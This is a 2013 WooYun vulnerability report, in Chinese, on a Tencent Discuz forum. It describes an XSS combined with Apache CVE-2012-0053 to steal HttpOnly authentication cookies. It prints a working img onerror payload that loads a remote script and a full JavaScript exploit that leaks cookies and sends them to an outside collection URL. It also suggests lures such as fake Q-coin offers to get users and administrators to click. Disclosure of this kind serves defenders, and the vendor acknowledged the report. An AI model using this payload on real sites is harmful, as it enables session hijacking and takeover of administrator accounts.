当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020583

漏洞标题:腾讯某论坛XSS攻击,获取httponly

相关厂商:腾讯

漏洞作者: 酱油甲

提交时间:2013-03-24 18:33

修复时间:2013-05-08 18:34

公开时间:2013-05-08 18:34

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-24: 细节已通知厂商并且等待厂商处理中
2013-03-25: 厂商已经确认,细节仅向厂商公开
2013-04-04: 细节向核心白帽子及相关领域专家公开
2013-04-14: 细节向普通白帽子公开
2013-04-24: 细节向实习白帽子公开
2013-05-08: 细节向公众公开

简要描述:

貌似DZ那边经常忽略啊,就来这边提交吧,反正也是腾讯的论坛
腾讯某DZ论坛XSS攻击,获取httponly

详细说明:

http://bbs.open.qq.com/
是APACHE服务器,由于存在CVE-2012-0053,再加上一个小小的跨站,即可获取HTTPONLY的COOKIE
测试环境:win7+火狐浏览器19
简单说下
1.这个论坛是APACHE服务器上的,存在CVE-2012-0053,这东西能突破HTTPONLY,你们肯定知道
于是我们来到任何地方,发个图片,然后在介绍里面写入:

<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='http://t.cn/z12345G';>


DZ限制了长度,利用短域名,再加上上面这串代码刚好可以嵌入

0.jpg


1.jpg


这个位置需要点击才能触发跨站(这个洞洞记得有人提交过了,忘记您名字了……不好意思……不过不是本文重点,不做讨论),如何让别人点图片呢?
图片写个:点击送Q币 ? 怎么样?

4.jpg


2.DZ X2.5的AUTH是HTTPONLY的,所以DZ经常无视XSS漏洞吧?但是由于APACHE的漏洞,我们就能突破这个HTTPONLY

3.jpg


例如下面这个JS(写的不好请见谅……)

makeRequest();
function setCookies (good) {
var str = "";
for (var i=0; i< 819; i++) {
str += "x";
}
for (i = 0; i < 10; i++) {
if (good) {
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).
toUTCString()+"; path=/;";
}
else {
var cookie = "xss"+i+"="+str+";path=/";
}
document.cookie = cookie;
}
}
function makeRequest() {
setCookies();
function parseCookies () {
var cookie_dict = {};
if (xhr.readyState === 4 && xhr.status === 400) {
var content = xhr.responseText.replace(/\r|\n/g,'').match
(/<pre>(.+)<\/pre>/);
if (content.length) {
content = content[1].replace("Cookie: ", "");
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);

for (var i=0; i<cookies.length; i++) {
var s_c = cookies[i].split('=',2);
cookie_dict[s_c[0]] = s_c[1];
}
}
setCookies(true);
var x=new Image();
try
{
var myopener='';
myopener=window.opener && window.opener.location?window.opener.location:'';
}
catch(err)
{
}
x.src='http://www.xxxx.com/save.php?cookie='+encodeURIComponent(JSON.stringify(cookie_dict));
}
}
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open("GET", "httponly.php", true);
xhr.send(null);
}


3.然后我们来看下获取的信息,可爱的auth被爆出来了不是么~~

2.jpg


4.更大的用途,怎么诱惑管理员来点呢?
这个自由发挥吧,我只在自己的内网测了下,确实是可以通过这个COOKIE登陆后台的
但是需要管理员先登陆过后台并且还要改下请求头才行~~

漏洞证明:

2.jpg

修复方案:

你们比我懂

版权声明:转载请注明来源 酱油甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2013-03-25 17:41

厂商回复:

感谢反馈,已在处理中。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-03-24 18:46 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    哇塞!

  2. 2013-03-24 19:11 | dtc ( 路人 | Rank:10 漏洞数:1 | 业余技术爱好者,来乌云学习。)

    刘明

  3. 2013-03-24 23:33 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:170 | 力不从心)

    给力哦!HTTPONLY!!!!教程啊

  4. 2013-03-29 14:13 | Drizzle.Risk ( 普通白帽子 | Rank:255 漏洞数:19 | You have an error in your SQL syntax; ch...)

    CVE-2012-0053 ?

  5. 2014-04-26 14:50 | 橘子 ( 路人 | Rank:0 漏洞数:3 | 呢个...羞射高中生一枚。带上大神@Haswell...)

    洞主问下QWQ接收XSS的是啥...?